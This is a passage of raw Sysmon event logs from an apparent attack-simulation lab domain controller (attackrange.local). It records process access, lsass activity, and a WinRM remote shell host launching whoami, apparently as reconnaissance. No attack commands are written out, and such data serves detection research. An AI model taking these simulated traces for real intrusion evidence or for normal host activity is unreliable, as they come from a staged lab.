13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-859F-5FCF-D200-000000009101}5000C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-859F-5FCF-D200-000000009101}5000C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.317{10ACEC4A-859F-5FCF-D200-000000009101}5000C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000004254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.100{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.100{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.084{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.084{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.084{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.084{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-85A0-5FCF-DC00-000000009101}1172C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM